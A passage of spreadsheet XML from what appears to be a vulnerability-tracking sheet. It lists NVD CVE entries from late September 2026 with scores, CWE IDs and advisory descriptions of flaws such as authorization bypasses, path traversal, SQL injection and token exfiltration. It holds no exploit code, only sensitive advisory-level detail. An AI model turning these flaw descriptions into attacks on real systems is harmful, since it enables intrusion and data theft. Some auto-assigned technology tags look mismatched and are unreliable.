      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to enforce authorization checks on GET endpoints in UserAddrController that retrieve customer address data. Authenticated attackers can call /user/addr/page and /user/addr/info endpoints to harvest all customer addresses including names, phone numbers, and postal information.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102365</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102373</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to validate ticket ownership when loading comments via the threadedit parameter in thread.php. Authenticated attackers can enumerate sequential comment IDs to read private comments from other users' tickets without proper authorization checks.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102373</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18417</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>The native BSD-socket layer recorded a pending asynchronous socket error by type-punning it into struct net_context's void user_data field (ctx-&gt;user_data = INT_TO_POINTER(-status) in zsock_accepted_cb(), zsock_received_cb(), zsock_connected_cb() and zsock_close_ctx() in subsys/net/lib/sockets/sockets_inet.c), reading it back with POINTER_TO_INT(). That same field is owned by the network stack for listening TCP contexts: net_tcp_accept() stores the parent context pointer there and the TCP core passes it back to the registered accept callback. A failed accept therefore left a small integer (an errno value) where the stack expected a struct net_context .
When the network interface carrying a listening TCP socket goes down, close_tcp_conn() in subsys/net/ip/tcp.c invokes the accept callback with -ENETDOWN and the context's user_data. In v4.3.0 the callback was not disarmed afterwards, so a second interface-down event forwarded the previously stored errno to zsock_accepted_cb(), which dereferenced it as the parent context and performed several stores through it (sock_set_error()'s read-modify-write of socket_data, k_fifo_cancel_wait(&amp;parent-&gt;recv_q)) — the crash described in the fix's commit message. v4.3.1 and v4.4.x carry a later change clearing conn-&gt;accept_cb after the error callback (269cb8823d3 on the v4.3 branch, 913fae5169425550f2364655298fceb79b320066 on main), which closes that repeat path; on those releases the poisoned cookie remains reachable only by a narrower race, a handshake completing alongside the interface-down still passing the stale cookie to k_fifo_put(&amp;parent-&gt;accept_q, ...), and by getsockopt(SO_ERROR), which reads the field back unconditionally.
On v4.3.0 an application that keeps a listening TCP socket open across repeated link-down events is sufficient to reach the defect; the triggering condition is a network-interface state change, not attacker-supplied packet data, so the practical attacker is one able to force the link down repeatedly (for example an adjacent attacker disrupting a wireless link) or one with local/physical access. Because both the faulting address and the stored data are fixed small constants derived from the errno value, the outcome is a wild-pointer access leading to a kernel fatal error — a denial of service (device crash or reset) rather than an attacker-directed memory corruption.
The fix stores the pending error in a dedicated net_context.sock_error field and converts every producer and consumer to sock_set_error()/sock_get_error(), leaving user_data untouched. As a side effect it also stops getsockopt(SO_ERROR) — which is evaluated unconditionally — from returning the kernel address held in user_data to a userspace application.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18417</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19444</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>jordan@liggitt.net</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability was discovered in the Kubernetes kubectl client's kubectl cp command on Windows. When copying files from a container, kubectl runs tar inside the container to build a tar archive, transfers it over the network, and unpacks it on the local machine. If the tar binary in the container is malicious, it can execute arbitrary code and emit unexpected output, allowing an attacker who controls container contents to write files to arbitrary paths on the user's local machine when kubectl cp is invoked, limited only by the system permissions of the local user. This issue only affects kubectl clients running on Windows.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19444</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82385</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor in Apache Roller 6.1.5 allows a weblog administrator to read files on the application classpath, including Roller configuration files containing secrets, by authoring a Velocity template that uses an include directive to load a classpath resource outside the theme namespace. Roller treats weblog administrators as untrusted and enables a Velocity sandbox, but the include and parse directives are not confined by it. No non-default configuration is required; this affects any weblog whose administrator can author templates. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which confines includes to the active theme and removes classpath resource loading from weblog rendering.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82385</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82915</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Path Traversal.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82915</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84744</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The WPForms Lite WordPress plugin from 1.5.0.1 to 2.0.2 does not remove shortcode delimiters from submitted field values before writing them back into the rendered form, allowing unauthenticated users to execute arbitrary shortcodes registered on the site and read the details of attachments belonging to non-public posts.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84744</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93537</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>kubernetes, suse</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>A user who can supply bundle content to a repository referenced by a GitRepo resource, for example through Git push access, or through permission to create or modify a GitRepo, can cause SUSE Rancher Fleet to read files from the filesystem of the environment that processes the bundle and include their contents in the generated Bundle resource. This can expose configuration or credential material that the user has no Kubernetes RBAC permission to read, including Helm registry credentials made available to the bundle-processing job when per-path Helm credentials are configured.
This affects Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16, 0.12 before 0.12.20 and potentially older unsupported versions.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93537</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93540</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A privilege mismatch was found in Fleet. When a bundle requested namespace labels or annotations through the namespaceLabels and namespaceAnnotations options, the resulting namespace metadata update was not subject to the same authorization as the rest of the bundle's deployment. As a result, a bundle could change labels and annotations on a target namespace even when the identity it was pinned to was not authorized to modify that namespace.
This affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16 and potentially older versions.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93540</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94283</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in libX11's XIM (X Input Method) attribute parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94283</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96740</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the StreamsHub Console for Apache Kafka. Tenant-supplied Kafka client properties from the Console custom resource are copied into the console-api AdminClient configuration without filtering security-sensitive keys, allowing a Console CR author to set config.providers and bootstrap.servers to exfiltrate the console-api ServiceAccount token to an attacker-controlled broker.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96740</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82930</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module does not verify tokens in its authorization middleware, leaving all HTTP API and WebSocket endpoints accessible without authentication. An unauthenticated attacker on the LAN can query these endpoints, access system information, and send raw control commands to manipulate building automation devices.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82930</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89303</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>The Post Voting System WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing any authenticated user to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89303</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101102</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-264, CWE-265</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in deepseek-ai deepseek-harness up to 0.1.0-rc.7. Impacted is the function run_code of the component Code Mode Sandbox. The manipulation results in sandbox issue. The attack can be executed remotely. The vendor's own code, SAFETY.md, and design notes all explicitly state the worker is "containment, not a security boundary". The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101102</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101105</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in code-projects Matrimonial System 1.0. The affected element is the function processprofile_form of the file /create_profile of the component Profile Creation Endpoint. This manipulation of the argument fname causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101105</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101142</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
